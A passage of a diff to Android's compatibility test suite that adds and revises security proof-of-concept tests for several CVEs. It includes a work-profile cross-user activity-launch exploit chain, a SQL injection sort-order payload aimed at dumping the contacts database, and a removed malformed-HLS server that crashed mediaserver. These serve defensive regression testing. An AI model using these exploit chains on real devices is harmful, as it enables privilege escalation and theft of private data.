+ intent.setClassName(SECURITY_CTS_PACKAGE_NAME, clazz.getName());
+ intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ context.startActivity(intent);
+ }
+
+ /**
+ * b/175817081
+ */
+ @Test
+ @SecurityTest
+ public void testPocCVE_2021_0327() throws Exception {
+ Log.d(TAG, "test start");
+ testActivityCreated=false;
+ testActivityRequested=false;
+ launchActivity(IntroActivity.class);
+ synchronized(CVE_2021_0327.class){
+ if(!testActivityRequested) {
+ Log.d(TAG, "test is waiting for TestActivity to be requested to run");
+ CVE_2021_0327.class.wait();
+ Log.d(TAG, "got signal");
+ }
+ }
+ synchronized(CVE_2021_0327.class){
+ if(!testActivityCreated) {
+ Log.d(TAG, "test is waiting for TestActivity to run");
+ CVE_2021_0327.class.wait(10000);
+ Log.d(TAG, "got signal");
+ }
+ }
+ Log.d(TAG, "test completed. testActivityCreated=" + testActivityCreated);
+ if(errorMessage != null){
+ Log.d(TAG, "errorMessage=" + errorMessage);
+ }
+ assertTrue(errorMessage==null);
+ assertFalse(testActivityCreated);
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0327/IntroActivity.java b/tests/tests/security/src/android/security/cts/CVE_2021_0327/IntroActivity.java
new file mode 100644
index 0000000..fd2af3a
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_0327/IntroActivity.java
@@ -0,0 +1,129 @@
+package android.security.cts.CVE_2021_0327;
+
+import android.app.Activity;
+import android.app.AlertDialog;
+import android.app.admin.DevicePolicyManager;
+import android.content.ClipData;
+import android.content.ComponentName;
+import android.content.Intent;
+import android.net.Uri;
+import android.os.Bundle;
+import android.view.View;
+import android.util.Log;
+import android.os.SystemClock;
+
+//import android.support.test.InstrumentationRegistry;
+import androidx.test.InstrumentationRegistry;
+import android.support.test.uiautomator.UiDevice;
+import android.support.test.uiautomator.UiObject2;
+import android.support.test.uiautomator.By;
+import android.support.test.uiautomator.BySelector;
+import java.io.*;
+import java.util.stream.Collectors;
+
+import android.security.cts.CVE_2021_0327.workprofilesetup.AdminReceiver;
+
+public class IntroActivity extends Activity {
+
+ private static final int AR_WORK_PROFILE_SETUP = 1;
+ private static final String TAG = "CVE_2021_0327";
+
+ private void launchOtherUserActivity() {
+ Log.d(TAG,"launchOtherUserActivity()");
+ Intent intent = new Intent(this, OtherUserActivity.class);
+ intent.setClipData(new ClipData("d", new String[]{"a/b"}, new ClipData.Item(Uri.parse("content://android.security.cts.CVE_2021_0327.BadProvider"))));
+ intent.addFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION);
+ startActivity(intent);
+ finish();
+ }
+
+ @Override
+ protected void onCreate(Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+ Log.d(TAG,"IntroActivity.OnCreate()");
+ if (isProfileOwner()) {
+ } else if (canLaunchOtherUserActivity()) {
+ launchOtherUserActivity();
+ } else {
+ setupWorkProfile(null);
+
+ //detect buttons to click
+ boolean profileSetUp=false;
+ String button;
+ java.util.List<UiObject2> objects;
+ UiDevice mUiDevice = UiDevice.getInstance(InstrumentationRegistry.getInstrumentation());
+ BySelector selector = By.clickable(true);
+
+
+ while(!profileSetUp){
+ do {
+ Log.i(TAG, "waiting for clickable");
+ SystemClock.sleep(3000);
+ } while((objects = mUiDevice.findObjects(selector)).size()==0);
+ for(UiObject2 o : objects){
+ button=o.getText();
+ Log.d(TAG,"button:" + button);
+
+ if(button==null){
+ continue;
+ }
+
+ switch(button){
+ case "Delete" :
+ o.click();
+ Log.i(TAG, "clicked: Delete");
+ break;
+ case "Accept & continue" :
+ o.click();
+ Log.i(TAG, "clicked: Accept & continue");
+ break;
+ case "Next" :
+ o.click();
+ profileSetUp=true;
+ Log.i(TAG, "clicked: Next");
+ break;
+ default :
+ continue;
+ }
+ break;
+ }
+ }
+ //end while(!profileSetUp);
+ }
+ }
+
+ private boolean isProfileOwner() {
+ return getSystemService(DevicePolicyManager.class).isProfileOwnerApp(getPackageName());
+ }
+
+ private boolean canLaunchOtherUserActivity() {
+ Intent intent = new Intent("android.security.cts.CVE_2021_0327.OTHER_USER_ACTIVITY");
+ return (getPackageManager().resolveActivity(intent, 0) != null);
+ }
+
+ public void setupWorkProfile(View view) {
+ Log.d(TAG, "setupWorkProfile()");
+ Intent intent = new Intent(DevicePolicyManager.ACTION_PROVISION_MANAGED_PROFILE);
+ intent.putExtra(
+ DevicePolicyManager.EXTRA_PROVISIONING_DEVICE_ADMIN_COMPONENT_NAME,
+ new ComponentName(this, AdminReceiver.class)
+ );
+ startActivityForResult(intent, AR_WORK_PROFILE_SETUP);
+ }
+
+ @Override
+ protected void onActivityResult(int requestCode, int resultCode, Intent data) {
+ Log.d(TAG, "onActivityResult()");
+ if (requestCode == AR_WORK_PROFILE_SETUP) {
+ if (resultCode == RESULT_OK) {
+ launchOtherUserActivity();
+ } else {
+ new AlertDialog.Builder(this)
+ .setMessage("Work profile setup failed")
+ .setPositiveButton("ok", null)
+ .show();
+ }
+ }
+ super.onActivityResult(requestCode, resultCode, data);
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0327/OtherUserActivity.java b/tests/tests/security/src/android/security/cts/CVE_2021_0327/OtherUserActivity.java
new file mode 100644
index 0000000..3ed38de
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_0327/OtherUserActivity.java
@@ -0,0 +1,94 @@
+package android.security.cts.CVE_2021_0327;
+
+import android.annotation.SuppressLint;
+import android.app.Activity;
+import android.app.AlertDialog;
+import android.net.Uri;
+import android.os.AsyncTask;
+import android.os.Bundle;
+import android.os.Handler;
+import android.os.IBinder;
+import android.os.ParcelFileDescriptor;
+import android.os.ResultReceiver;
+import android.view.View;
+import android.util.Log;
+import java.io.File;
+import java.io.FileDescriptor;
+import java.io.*;
+import java.util.stream.Collectors;
+import java.util.concurrent.TimeUnit;
+import android.os.SystemClock;
+
+public class OtherUserActivity extends Activity {
+
+ static ParcelFileDescriptor sTakenBinder;
+ private static final String TAG = "CVE_2021_0327";
+ String errorMessage = null;
+
+ @Override
+ protected void onCreate(Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+ doMakeProviderBad(null);
+ SystemClock.sleep(5000);
+ doStuff(null);
+ }
+
+ public void doMakeProviderBad(View view) {
+ new MakeProviderBad().execute();
+ }
+
+ private class MakeProviderBad extends AsyncTask<Void, Void, Exception> {
+
+ @Override
+ protected Exception doInBackground(Void... voids) {
+ try {
+ if (sTakenBinder != null) {
+ sTakenBinder.close();
+ sTakenBinder = null;
+ }
+
+ Uri uri = getIntent().getClipData().getItemAt(0).getUri();
+ Bundle callResult = getContentResolver().call(uri, "get_aidl", null, null);
+ IBadProvider iface = IBadProvider.Stub.asInterface(callResult.getBinder("a"));
+ sTakenBinder = iface.takeBinder();
+ if (sTakenBinder == null) {
+ throw new Exception("Failed to find binder of provider");
+ }
+ iface.exit();
+ } catch (Exception e) {
+ errorMessage = errorMessage==null ? e.toString() : errorMessage + ", " + e.toString();
+ }
+
+ return null;
+ }
+
+ @Override
+ protected void onPostExecute(Exception e) {
+ }
+ }
+
+ public void doStuff(View view) {
+ sendCommand("start", "--user", "0", "-d", "content://android.security.cts.CVE_2021_0327.BadProvider", "-n", "android.security.cts/.CVE_2021_0327.TestActivity");
+ }
+
+ @SuppressLint("PrivateApi")
+ void sendCommand(String... args) {
+ String[] command = new String[args.length + 2];
+ command[0] = "/system/bin/cmd";
+ command[1] = "activity";
+ System.arraycopy(args, 0, command, 2, args.length);
+
+ try{
+ Runtime.getRuntime().exec(command);
+ } catch(Exception e){
+ errorMessage = errorMessage==null ? e.toString() : errorMessage + ", " + e.toString();
+ }
+ finally{
+ synchronized(CVE_2021_0327.class){
+ CVE_2021_0327.testActivityRequested=true;
+ CVE_2021_0327.errorMessage = errorMessage;
+ CVE_2021_0327.class.notifyAll();
+ }
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0327/TestActivity.java b/tests/tests/security/src/android/security/cts/CVE_2021_0327/TestActivity.java
new file mode 100644
index 0000000..d44a220
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_0327/TestActivity.java
@@ -0,0 +1,17 @@
+package android.security.cts.CVE_2021_0327;
+
+import android.app.Activity;
+import android.os.Bundle;
+import android.util.Log;
+
+public class TestActivity extends Activity {
+ @Override
+ protected void onCreate(Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+ Log.d("CVE_2021_0327","TestActivity.onCreate()");
+ synchronized(CVE_2021_0327.class){
+ CVE_2021_0327.testActivityCreated=true;
+ CVE_2021_0327.class.notifyAll();
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0327/workprofilesetup/AdminReceiver.java b/tests/tests/security/src/android/security/cts/CVE_2021_0327/workprofilesetup/AdminReceiver.java
new file mode 100644
index 0000000..d374dfd
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_0327/workprofilesetup/AdminReceiver.java
@@ -0,0 +1,7 @@
+package android.security.cts.CVE_2021_0327.workprofilesetup;
+
+import android.app.admin.DeviceAdminReceiver;
+
+public class AdminReceiver extends DeviceAdminReceiver {
+
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0327/workprofilesetup/ProvisionedActivity.java b/tests/tests/security/src/android/security/cts/CVE_2021_0327/workprofilesetup/ProvisionedActivity.java
new file mode 100644
index 0000000..1ae1c5d
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_0327/workprofilesetup/ProvisionedActivity.java
@@ -0,0 +1,43 @@
+package android.security.cts.CVE_2021_0327.workprofilesetup;
+
+import android.app.Activity;
+import android.app.admin.DevicePolicyManager;
+import android.content.ComponentName;
+import android.content.Intent;
+import android.content.IntentFilter;
+import android.content.pm.PackageManager;
+import android.os.Bundle;
+
+import android.security.cts.CVE_2021_0327.OtherUserActivity;
+
+public class ProvisionedActivity extends Activity {
+ @Override
+ protected void onCreate(Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+
+ getPackageManager().setComponentEnabledSetting(
+ new ComponentName(
+ this,
+ OtherUserActivity.class
+ ),
+ PackageManager.COMPONENT_ENABLED_STATE_ENABLED,
+ PackageManager.DONT_KILL_APP
+ );
+
+ DevicePolicyManager manager = getSystemService(DevicePolicyManager.class);
+ //IntentFilter intentFilter = new IntentFilter("com.example.clearedshell.OTHER_USER_ACTIVITY");
+ IntentFilter intentFilter = new IntentFilter("android.security.cts.CVE_2021_0327.OTHER_USER_ACTIVITY");
+ //IntentFilter intentFilter = new IntentFilter("android.security.cts.CVE_2021_0327$OTHER_USER_ACTIVITY");
+ intentFilter.addCategory(Intent.CATEGORY_DEFAULT);
+ ComponentName admin = new ComponentName(this, AdminReceiver.class);
+ manager.addCrossProfileIntentFilter(
+ admin,
+ intentFilter,
+ DevicePolicyManager.FLAG_MANAGED_CAN_ACCESS_PARENT
+ );
+ manager.setProfileEnabled(admin);
+
+ setResult(RESULT_OK);
+ finish();
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0339.java b/tests/tests/security/src/android/security/cts/CVE_2021_0339.java
index 5ace5df..a59d749 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2021_0339.java
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_0339.java
@@ -17,98 +17,126 @@
package android.security.cts;
import static org.junit.Assert.assertThat;
-import static org.hamcrest.Matchers.lessThan;
+import static org.junit.Assume.assumeThat;
+import static org.hamcrest.Matchers.*;
-import android.test.AndroidTestCase;
import android.app.Activity;
import android.content.Context;
import android.content.Intent;
-import android.platform.test.annotations.SecurityTest;
+import android.os.Bundle;
+import android.os.RemoteCallback;
import android.os.SystemClock;
+import android.platform.test.annotations.SecurityTest;
+import android.test.AndroidTestCase;
+import android.util.Log;
import androidx.test.InstrumentationRegistry;
import androidx.test.runner.AndroidJUnit4;
-import android.util.Log;
import org.junit.Test;
import org.junit.runner.RunWith;
+import java.util.concurrent.CompletableFuture;
+import java.util.concurrent.TimeUnit;
+
@SecurityTest
@RunWith(AndroidJUnit4.class)
public class CVE_2021_0339 {
static final String TAG = CVE_2021_0339.class.getSimpleName();
private static final String SECURITY_CTS_PACKAGE_NAME = "android.security.cts";
+ private static final String CALLBACK_KEY = "testactivitycallback";
+ private static final String RESULT_KEY = "testactivityresult";
+ static final int DURATION_RESULT_CODE = 1;
static final int MAX_TRANSITION_DURATION_MS = 3000; // internal max
static final int TIME_MEASUREMENT_DELAY_MS = 5000; // tolerance for lag.
- public static boolean testCompleted;
- public FirstActivity fActivity;
- public SecondActivity sActivity;
-
- private void launchActivity(Class<? extends Activity> clazz) {
+ private void launchActivity(Class<? extends Activity> clazz, RemoteCallback cb) {
final Context context = InstrumentationRegistry.getInstrumentation().getContext();
final Intent intent = new Intent(Intent.ACTION_MAIN);
intent.setClassName(SECURITY_CTS_PACKAGE_NAME, clazz.getName());
intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ intent.putExtra(CALLBACK_KEY, cb);
context.startActivity(intent);
}
/**
* b/175817167
+ * start the first activity and get the result from the remote callback
*/
@Test
@SecurityTest
public void testPocCVE_2021_0339() throws Exception {
+ CompletableFuture<Integer> callbackReturn = new CompletableFuture<>();
+ RemoteCallback cb = new RemoteCallback((Bundle result) ->
+ callbackReturn.complete(result.getInt(RESULT_KEY)));
+ launchActivity(FirstActivity.class, cb); // start activity with callback as intent extra
- Log.d(TAG, "test start");
- testCompleted = false;
- launchActivity(FirstActivity.class);
+ // blocking while the remotecallback is unset
+ int duration = callbackReturn.get(15, TimeUnit.SECONDS);
- //wait for SecondActivity animation to complete
- synchronized(CVE_2021_0339.class){
- if(!testCompleted)
- CVE_2021_0339.class.wait();
- }
- Log.d(TAG, "test completed");
+ // if we couldn't get the duration of secondactivity in firstactivity, the default is -1
+ assumeThat(duration, not(equals(-1)));
- //A duration of a transition from "FirstActivity" to "Second Activity"
- //is set in this test to 10 seconds
- // (res/anim/translate1.xml and res/anim/translate2.xml)
- //The fix is supposed to limit the duration to 3000 ms.
- // testing for > 8s
- assertThat(SecondActivity.duration,
- lessThan(MAX_TRANSITION_DURATION_MS + TIME_MEASUREMENT_DELAY_MS));
+ // the max duration after the fix is 3 seconds.
+ // we check to see that the total duration was less than 8 seconds after accounting for lag
+ assertThat(duration,
+ lessThan(MAX_TRANSITION_DURATION_MS + TIME_MEASUREMENT_DELAY_MS));
}
+ /**
+ * create an activity so that the second activity has something to animate from
+ * start the second activity and get the result
+ * return the result from the second activity in the remotecallback
+ */
public static class FirstActivity extends Activity {
+ private RemoteCallback cb;
- @Override
- public void onEnterAnimationComplete() {
- super.onEnterAnimationComplete();
- Intent intent = new Intent(this, SecondActivity.class);
- intent.putExtra("STARTED_TIMESTAMP", SystemClock.uptimeMillis());
- startActivity(intent);
- overridePendingTransition(R.anim.translate2,R.anim.translate1);
- Log.d(TAG,this.getLocalClassName()+" onEnterAnimationComplete()");
- }
+ @Override
+ public void onCreate(Bundle bundle) {
+ super.onCreate(bundle);
+ cb = (RemoteCallback) getIntent().getExtras().get(CALLBACK_KEY);
+ }
+
+ @Override
+ public void onEnterAnimationComplete() {
+ super.onEnterAnimationComplete();
+ Intent intent = new Intent(this, SecondActivity.class);
+ intent.putExtra("STARTED_TIMESTAMP", SystemClock.uptimeMillis());
+ startActivityForResult(intent, DURATION_RESULT_CODE);
+ overridePendingTransition(R.anim.translate2,R.anim.translate1);
+ Log.d(TAG,this.getLocalClassName()+" onEnterAnimationComplete()");
+ }
+
+ @Override
+ protected void onActivityResult(int requestCode,int resultCode, Intent data) {
+ super.onActivityResult(requestCode, resultCode, data);
+ if (requestCode == DURATION_RESULT_CODE && resultCode == RESULT_OK) {
+ // this is the result that we requested
+ int duration = data.getIntExtra("duration", -1); // get result from secondactivity
+ Bundle res = new Bundle();
+ res.putInt(RESULT_KEY, duration);
+ finish();
+ cb.sendResult(res); // update callback in test
+ }
+ }
}
+ /**
+ * measure time since secondactivity start to secondactivity animation complete
+ * return the duration in the result
+ */
public static class SecondActivity extends Activity{
- public static int duration = 0;
-
- @Override
- public void onEnterAnimationComplete() {
- super.onEnterAnimationComplete();
- long completedTs = SystemClock.uptimeMillis();
- long startedTs = getIntent().getLongExtra("STARTED_TIMESTAMP", 0);
- duration = (int)(completedTs - startedTs);
- Log.d(TAG, this.getLocalClassName()
- + " onEnterAnimationComplete() duration=" + Long.toString(duration));
-
- //Notify main thread that the test is completed
- synchronized(CVE_2021_0339.class){
- CVE_2021_0339.testCompleted = true;
- CVE_2021_0339.class.notifyAll();
+ @Override
+ public void onEnterAnimationComplete() {
+ super.onEnterAnimationComplete();
+ long completedTs = SystemClock.uptimeMillis();
+ long startedTs = getIntent().getLongExtra("STARTED_TIMESTAMP", 0);
+ int duration = (int)(completedTs - startedTs);
+ Log.d(TAG, this.getLocalClassName()
+ + " onEnterAnimationComplete() duration=" + Long.toString(duration));
+ Intent durationIntent = new Intent();
+ durationIntent.putExtra("duration", duration);
+ setResult(RESULT_OK, durationIntent); // set result for firstactivity
+ finish(); // firstactivity only gets the result when we finish
}
- }
}
}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0394.java b/tests/tests/security/src/android/security/cts/CVE_2021_0394.java
new file mode 100644
index 0000000..d3278ee
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_0394.java
@@ -0,0 +1,42 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assert.assertFalse;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import androidx.test.runner.AndroidJUnit4;
+
+@RunWith(AndroidJUnit4.class)
+public class CVE_2021_0394 {
+ static {
+ System.loadLibrary("ctssecurity_jni");
+ }
+
+ /**
+ * b/172655291
+ */
+ @SecurityTest(minPatchLevel = "2021-03")
+ @Test
+ public void testPocCVE_2021_0394() throws Exception {
+ assertFalse(poc());
+ }
+
+ public static native boolean poc();
+}
diff --git a/tests/tests/security/src/android/security/cts/SQLiteTest.java b/tests/tests/security/src/android/security/cts/SQLiteTest.java
new file mode 100644
index 0000000..47407ca
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/SQLiteTest.java
@@ -0,0 +1,81 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.content.Context;
+import android.content.ContentResolver;
+import android.content.Intent;
+import android.content.pm.PackageManager.NameNotFoundException;
+import android.net.Uri;
+import android.platform.test.annotations.SecurityTest;
+import android.provider.VoicemailContract;
+import android.test.AndroidTestCase;
+import androidx.test.InstrumentationRegistry;
+import static org.junit.Assert.*;
+
+@SecurityTest
+public class SQLiteTest extends AndroidTestCase {
+
+ private ContentResolver mResolver;
+ private String mPackageName;
+ private Context mContext;
+
+ @Override
+ protected void setUp() throws Exception {
+ super.setUp();
+ mResolver = getContext().getContentResolver();
+ mContext = InstrumentationRegistry.getTargetContext();
+ mPackageName = mContext.getPackageName();
+ }
+
+ /**
+ * b/139186193
+ */
+ @SecurityTest(minPatchLevel = "2019-11")
+ public void test_android_cve_2019_2195() {
+ Uri uri = VoicemailContract.Voicemails.CONTENT_URI;
+ uri = uri.buildUpon().appendQueryParameter("source_package", mPackageName).build();
+
+ try {
+ mContext.grantUriPermission(mPackageName, uri,
+ Intent.FLAG_GRANT_READ_URI_PERMISSION | Intent.FLAG_GRANT_WRITE_URI_PERMISSION
+ | Intent.FLAG_GRANT_PERSISTABLE_URI_PERMISSION);
+ } catch (Exception e) {
+ if (e instanceof java.lang.SecurityException) {
+ // this suggests com.android.providers.contacts.VoicemailContentProvider
+ // does not allow granting of Uri permissions, hence return.
+ return;
+ }
+ }
+
+ try {
+ String fileToDump = mContext.createPackageContext("com.android.providers.contacts", 0)
+ .getDatabasePath("contacts2.db").getAbsolutePath();
+ try {
+ mResolver.query(uri, null, null, null,
+ "_id ASC LIMIT _TOKENIZE('calls(_data,_data,_data,source_package,type) VALUES(''"
+ + fileToDump + "'',?,?,''" + mPackageName + "'',4);',0,'','Z')")
+ .close();
+ fail("Vulnerable function exists");
+ } catch (android.database.sqlite.SQLiteException e) {
+ // do nothing
+ }
+ } catch (NameNotFoundException n) {
+ // do nothing
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/StagefrightTest.java b/tests/tests/security/src/android/security/cts/StagefrightTest.java
index 949d4ce..bff8c2a 100644
--- a/tests/tests/security/src/android/security/cts/StagefrightTest.java
+++ b/tests/tests/security/src/android/security/cts/StagefrightTest.java
@@ -1146,91 +1146,6 @@
@Test
@SecurityTest(minPatchLevel = "2018-04")
- public void testStagefright_cve_2017_13279() throws Exception {
- Thread server = new Thread() {
- @Override
- public void run(){
- try (ServerSocket serverSocket = new ServerSocket(8080) {
- {setSoTimeout(10_000);} // time out after 10 seconds
- };
- Socket conn = serverSocket.accept()
- ) {
- OutputStream stream = conn.getOutputStream();
- byte http[] = ("HTTP/1.0 200 OK\r\nContent-Type: application/x-mpegURL\r\n\r\n"
- + "#EXTM3U\n#EXT-X-STREAM-INF:\n").getBytes();
- stream.write(http);
- while(!conn.isClosed())
- stream.write(("a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\n").getBytes());
- }
- catch(IOException e){
- }
- }
- };
- server.start();
- String uri = "http://127.0.0.1:8080/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
- + "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/"
- + "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.m3u8";
- final MediaPlayerCrashListener mpcl = new MediaPlayerCrashListener();
-
- LooperThread t = new LooperThread(new Runnable() {
- @Override
- public void run() {
-
- MediaPlayer mp = new MediaPlayer();
- mp.setOnErrorListener(mpcl);
- mp.setOnPreparedListener(mpcl);
- mp.setOnCompletionListener(mpcl);
- RenderTarget renderTarget = RenderTarget.create();
- Surface surface = renderTarget.getSurface();
- mp.setSurface(surface);
- AssetFileDescriptor fd = null;
- try {
- mp.setDataSource(uri);
- mp.prepareAsync();
- } catch (IOException e) {
- Log.e(TAG, e.toString());
- } finally {
- closeQuietly(fd);
- }
-
- Looper.loop();
- mp.release();
- }
- });
- t.start();
- Thread.sleep(60000); // Poc takes a while to crash mediaserver, waitForError
- // doesn't wait long enough
- assertFalse("Device *IS* vulnerable to CVE-2017-13279",
- mpcl.waitForError() == MediaPlayer.MEDIA_ERROR_SERVER_DIED);
- t.stopLooper();
- t.join(); // wait for thread to exit so we're sure the player was released
- server.join();
- }
-
- @Test
- @SecurityTest(minPatchLevel = "2018-04")
public void testStagefright_cve_2017_13276() throws Exception {
doStagefrightTest(R.raw.cve_2017_13276);
}
@@ -1259,6 +1174,18 @@
***********************************************************/
@Test
+ @SecurityTest(minPatchLevel = "2019-04")
+ public void testStagefright_cve_2019_2245() throws Exception {
+ doStagefrightTest(R.raw.cve_2019_2245);
+ }
+
+ @Test
+ @SecurityTest(minPatchLevel = "2019-04")
+ public void testStagefright_cve_2018_13925() throws Exception {
+ doStagefrightTest(R.raw.cve_2018_13925);
+ }
+
+ @Test
@SecurityTest(minPatchLevel = "2020-12")
public void testStagefright_cve_2020_11139() throws Exception {
doStagefrightTest(R.raw.cve_2020_11139);
diff --git a/tests/tests/textclassifier/Android.bp b/tests/tests/textclassifier/Android.bp
index ffd193f..8ba2eb9 100644
--- a/tests/tests/textclassifier/Android.bp
+++ b/tests/tests/textclassifier/Android.bp
@@ -22,7 +22,7 @@
"cts",
"vts10",
"general-tests",
- "mts"
+ "mts-extservices"
],
libs: ["android.test.base.stubs"],
static_libs: [
diff --git a/tests/tests/util/Android.bp b/tests/tests/util/Android.bp
index 9ed5826..c7d5d8d 100644
--- a/tests/tests/util/Android.bp
+++ b/tests/tests/util/Android.bp
@@ -20,7 +20,7 @@
"cts",
"vts10",
"general-tests",
- "mts",
+ "mts-statsd",
],
libs: ["android.test.runner.stubs"],
static_libs: [
diff --git a/tests/tests/wifi/Android.bp b/tests/tests/wifi/Android.bp
index 38a990f..06b6234 100644
--- a/tests/tests/wifi/Android.bp
+++ b/tests/tests/wifi/Android.bp
@@ -39,7 +39,8 @@
"cts",
"vts10",
"general-tests",
- "mts",
+ "mts-tethering",
+ "mts-wifi",
"sts",
],
diff --git a/tests/tests/wifi/src/android/net/wifi/cts/WifiInfoTest.java b/tests/tests/wifi/src/android/net/wifi/cts/WifiInfoTest.java
index 22124eb..643f42d 100644
--- a/tests/tests/wifi/src/android/net/wifi/cts/WifiInfoTest.java
+++ b/tests/tests/wifi/src/android/net/wifi/cts/WifiInfoTest.java
@@ -233,7 +233,7 @@
.build();
// different instances
- assertThat(info1).isNotSameAs(info2);
+ assertThat(info1).isNotSameInstanceAs(info2);
// assert that info1 didn't change
assertThat(info1.getSSID()).isEqualTo("\"" + TEST_SSID + "\"");
